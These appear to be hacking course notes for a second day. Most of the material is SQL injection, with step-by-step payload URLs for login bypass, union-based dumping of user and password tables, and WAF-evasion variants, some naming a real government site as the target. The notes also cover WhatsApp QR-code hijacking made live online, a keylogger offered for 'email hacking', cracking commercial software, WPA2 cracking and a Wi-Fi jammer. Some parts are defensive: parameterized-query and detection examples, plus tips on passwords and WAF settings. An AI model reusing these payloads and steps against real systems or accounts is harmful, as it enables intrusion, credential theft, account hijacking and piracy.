Day 2

-----
Web Application Hacking and Security
------------------------------------
Website: A collection of pages is known as a website.

Types of Websites

Static : The website has no database behind it, so the user can see the content
of the website but cannot submit any input from the user's side.

For Example: Pure HTML Site.

Dynamic : These websites have a database behind them, so they offer many user
interaction areas where the user enters information/data, which is sent to and
saved in the backend.

For Example: Facebook, Google, Twitter, UMS etc.

OWASP TOP 10 Attacks
O : Open
W : web
A : Application
S : Security
P : Project

www.owasp.org

SQL Injection
-------------
SQL : Structured Query Language

DDL : Data Definition Language

DML : Data Manipulation Language

DCL : Data Control Language

Attack 1: Authentication Bypass Attack
--------------------------------------
An attacker bypasses the login panel of the website and gains access to the
admin panel, with all the features through which he/she can manipulate the
website content.

Target : safesecurities.com.pk

userid=osama admin
password=bomb admin

select * from userstable where userid='osama'or'1'='1' and password='bomb'or'1'='1'

'or'1'='1
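The bypass above, reproduced as an added example (not from the course notes) against an in-memory SQLite table, with the parameterized query that defeats it placed beside the vulnerable one. The table name `userstable` comes from the notes; the sample rows and the `x` prefix on the payload are constructed.

```python
"""Added example: string-built login query vs. parameterized login query.
Passwords are stored in plaintext only to mirror the notes; real systems
store salted hashes."""
import sqlite3

# Constructed sample accounts (not from the notes).
ROWS = [("osama", "bomb"), ("admin", "s3cret")]

PAYLOAD = "'or'1'='1"  # the tautology shown in the notes


def setup() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE userstable (userid TEXT, password TEXT)")
    conn.executemany("INSERT INTO userstable VALUES (?, ?)", ROWS)
    return conn


def login_vulnerable(conn: sqlite3.Connection, userid: str, password: str) -> int:
    """User input is concatenated into the SQL text, so a quote in the
    input changes the query's structure. Returns the number of rows matched."""
    sql = ("select * from userstable where userid='" + userid +
           "' and password='" + password + "'")
    return len(conn.execute(sql).fetchall())


def login_safe(conn: sqlite3.Connection, userid: str, password: str) -> int:
    """Placeholders: the driver passes the values separately from the SQL,
    so the quote is just a character inside a string value."""
    sql = "select * from userstable where userid=? and password=?"
    return len(conn.execute(sql, (userid, password)).fetchall())


def demo() -> dict:
    """Run both versions with real credentials and with the injected payload."""
    conn = setup()
    return {
        "vuln_real_creds": login_vulnerable(conn, "osama", "bomb"),
        "vuln_payload": login_vulnerable(conn, "x" + PAYLOAD, "x" + PAYLOAD),
        "safe_real_creds": login_safe(conn, "osama", "bomb"),
        "safe_payload": login_safe(conn, "x" + PAYLOAD, "x" + PAYLOAD),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows} row(s) matched")
```

With the payload, the concatenated query matches every row (the trailing `or'1'='1'` is always true), while the parameterized query matches none.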

Union Based Injection
---------------------
DVWA

D : Damn
V : Vulnerable
W : Web
A : Application

Download : www.dvwa.org

Requirements
------------
1. XAMPP Server (turns your computer into a server)
X : Cross Platform
A : Apache
M : MySQL
P : PHP
P : Perl

Download: apachefriends.org

2. DVWA : Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is
damn vulnerable. Its main goals are to be an aid for security professionals to
test their skills and tools in a legal environment, help web developers better
understand the processes of securing web applications, and aid teachers/students
to teach/learn web application security in a classroom environment.

3. Copy and paste the downloaded files into the c:/xampp/htdocs folder

127.0.0.1/dvwa

username: admin
password: password

Step 1: Target
http://192.168.235.174/dvwa/vulnerabilities/sqli/

Step 2: Find any GET method in the URL of the website

GET : www.gmail.com/php?id=10
POST : www.gmail.com/id/
http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#

Step 3: Check the exception handling
http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1'&Submit=Submit#

Step 4: Find the total number of columns in the table that the id column belongs to.
http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1' order by 1--+&Submit=Submit#

Step 5: Dump the two columns on the right-hand side.
http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1' union select 1,2--+&Submit=Submit#

Step 6: Get the database name and version
Database->Tables->Columns->Data
http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1' union select database(),version()--+&Submit=Submit#

Step 7: Get all the tables of the website from the database.
Schema: the mother of the database.
Tables : information_schema.tables

Columns : information_schema.columns

http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1' union select 1,table_name from information_schema.tables--+&Submit=Submit#

Target Table Found : users

Step 8 : Get the columns of the users table
http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1' union select 1,column_name from information_schema.columns where table_name='users'--+&Submit=Submit#

Step 9 : Get the data from user and password columns
http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1' union select user,password from users--+&Submit=Submit#

Bypassing the Firewall aka Union Based Injection via Web Application Firewall Bypass Techniques
----------------------------------------------------------------------------------------------
Target: multan.gov.pk

Step 1: Find a GET method in the URL
http://target.com/files.php?id=1

Step 2: Check the exception handling
http://target.com/files.php?id=1'

Step 3: Count the total number of columns
http://target.com/files.php?id=1 order by 3--+

Step 4: Dump the columns on the right-hand side.
http://target.com/files.php?id=1 union select 1,2--+

Bypassing Technique 1: Upper/Lower Case
---------------------------------------
union select
UnIoN sElEcT -> new payload

http://target.com/files.php?id=1 UnIoN sElEcT 1,2--+

Bypassing Technique II:Inline Comments
--------------------------------------
Executable inline comments

/*!UnIoN*/ /*!SeLeCt*/

http://target.com/files.php?id=1 /*!UnIoN*/ /*!SeLeCt*/ 1,2--+

Bypassing Technique 3: Version Based Inline Executable Comments
---------------------------------------------------------------
http://target.com/files.php?id=1 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2--+

MySQL version -> executable comment version number
1.00.00 : 10000
2.00.00 : 20000
3.00.00
4.00.00
5.00.00 : 50000

Step 5: Get the database name
http://target.com/files.php?id=1 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,database()--+

Step 6: Get the tables of the database
http://target.com/files.php?id=1 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,/*!table_name*/ /*!from*/ /*!information_schema.tables*/--+

Target Table : users

Step 7: Get the columns
http://target.com/files.php?id=1 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,/*!50000GrOuP_cOnCaT(column_name)*/ /*!50000from*/ /*!50000information_schema.columns*/ /*!50000where*/ /*!50000table_name='users'*/--+

Step 8: Get the login and password
http://target.com/files.php?id=1 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,password from users--+

Secure
------
1. Do not run the WAF with its default security settings.
2. Keep the WAF's blacklisted parameters up to date.
3. Make sure you apply custom changes to the WAF according to the attacks you are receiving.
4. Never switch the firewall off in the hope of a faster response to traffic.
5. Have good validation of received queries and inputs at the server level as well.
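Point 5 above, as an added example (not from the course notes): a server-side check that first normalises the three evasion tricks shown in this section (mixed case, `/*! ... */` inline comments, version-prefixed `/*!50000 ... */` comments) to what the MySQL parser would effectively execute, and only then looks for the UNION ... SELECT pair. The payload strings are those from the notes; the function names and regexes are this example's own, and a check like this complements parameterized queries rather than replacing them.

```python
"""Added example: normalise MySQL comment/case obfuscation before matching.
Detection of a keyword pair is defence in depth; parameterized queries are
the actual fix for union-based injection."""
import re

# Executable comment: MySQL runs the inner text, optionally gated on a
# 5-digit version number, e.g. /*!UnIoN*/ or /*!50000UnIoN*/.
_EXEC_COMMENT = re.compile(r"/\*!\s*\d{0,5}\s*(.*?)\*/", re.DOTALL)
# Ordinary comment: the server ignores it, so drop it entirely.
_PLAIN_COMMENT = re.compile(r"/\*(?!!).*?\*/", re.DOTALL)
# Trailing comment markers used to discard the rest of the original query.
_TRAILING = re.compile(r"--\+?.*$|#.*$", re.DOTALL)


def normalize(value: str) -> str:
    """Return the text MySQL would effectively parse, lower-cased and with
    whitespace collapsed, so case and comment tricks no longer matter."""
    value = _EXEC_COMMENT.sub(r" \1 ", value)
    value = _PLAIN_COMMENT.sub(" ", value)
    value = _TRAILING.sub(" ", value)
    return " ".join(value.lower().split())


def looks_like_union_injection(value: str) -> bool:
    """True when a UNION keyword is followed by a SELECT keyword after
    normalisation. Word boundaries keep 'reunion selected' from matching."""
    return re.search(r"\bunion\b.*\bselect\b", normalize(value)) is not None


# Constructed inputs: the payloads from the notes plus two benign values.
SAMPLES = [
    "1",
    "union pacific",
    "1 union select 1,2--+",
    "1 UnIoN sElEcT 1,2--+",
    "1 /*!UnIoN*/ /*!SeLeCt*/ 1,2--+",
    "1 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,database()--+",
]


def scan(samples=SAMPLES) -> dict:
    """Map each raw parameter value to (normalised form, flagged?)."""
    return {s: (normalize(s), looks_like_union_injection(s)) for s in samples}


if __name__ == "__main__":
    for raw, (norm, flagged) in scan().items():
        print(f"{'FLAG ' if flagged else 'ok   '} {raw!r} -> {norm!r}")
```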

WhatsApp Hacking Attack : QRLJACKING
------------------------------------
Step 1: Download Kali Linux (2.99GB)
kali.org
How to Install and Run : Watch: https://www.youtube.com/watch?v=3ycEhwrkKYU

Step 2: Run and fill the username and password
username: root
password: toor

Step 3: Download QRLjacking code from Github
Open Terminal: git clone https://github.com/OWASP/QRLJacking.git

Step 4: Open the QRLframework folder
Step 5: Give execute permission to QrlJacker.py
chmod +x QrlJacker.py
Step 6: Run it in the terminal: ./QrlJacker.py
Step 7: Select Chat Application -> WhatsApp -> Select Port 1337

Step 8: Make this fake WhatsApp QR code LIVE on the internet.
Download a service, AKA ngrok:
https://ngrok.com/download

Facebook | Email Hacking Methods
--------------------------------
Family Keylogger : http://www.spyarsenal.com/download.html

How to Secure your Email Accounts
---------------------------------
1. Always use a passphrase instead of a password.
2. Always use a robust password; check its strength at
howsecureismypassword.net

checkurcardhackedornot.com
Card number, expiry date and CVV : Check

oncetherewasacrow

3. *&Ig3SimG&*
4. Activate 2-Step Verification in your Gmail.
5. Facebook: Backup codes
6. Always check your login activity in Gmail to spot any unauthorised access.

Reverse Engineering | Cracking LIVE
-----------------------------------
Reverse Engineering

Engineering : The goal of engineering is to build something.

High Level : Languages : C, C++, Java, Python

Middle Level : Assembly : .obj

Low Level : Binary : .exe

Requirements
--------------
1. OllyDBG
2. Perfect Keylogger
3. Windows Platform

Target : http://www.blazingtools.com/downloads.html

Wifi Hacking
-------------
Wi-Fi Hacking: Wi-Fi stands for wireless fidelity. It works on the 802.11 family
of protocols (802.11a onwards). The goal is to provide wireless connectivity
between hosts for data and information transfer and to establish a valid
communication channel for the same.

Types of KEY Security Encryptions
---------------------------------
1. WEP : 64bit
2. WPA : 128bit
3. WPA-2 PSK <--- Target 256 and above

Problem : You cannot brute-force the key.

How to crack it then : Dictionary Based Attack

Requirement
-----------
1. Kali Linux version 1.8 (old)
2. airmon-ng : A CLI application used to put your Wi-Fi device into monitor
mode and check whether it is capable of proceeding with the attack.
3. airodump-ng : This application dumps the packets in the air and identifies
how many Wi-Fi access points are nearby, so that you can select the target whose
security you want to test.
4. macchanger* : This helps you to spoof your Wi-Fi adapter's real identity with
a fake MAC address in case you want to do anonymous security testing.
5. aircrack-ng : This application cracks the key you captured during the Wi-Fi
hacking process by matching it against the dictionary; if a match is found, it
shows the key.

rahul -->!@#$% --> Mobile

Router:rahul->!@#$% <---- !@#$%---rahul

Network Attacks : Exploitation
------------------------------
Active Attack : This attack is aimed directly at the device. We obtain the IP of
the device and then attack that IP directly; the main goal is either to gain
access to the device or, failing that, to take the host down.

Example: Router DDoS Attack, DHCP Starvation Attack with Yersinia, and the
websploit Wi-Fi jammer

*Requirement : websploit in Kali Linux
Step 1: Open a terminal and type websploit

Step 2: To see the CLI network attack modules, type show modules

Source Tutorial: https://www.youtube.com/watch?v=I4OPAdE5yv8

Source Article: http://www.hackingtutorials.org/metasploit-tutorials/websploit-wifi-jammer/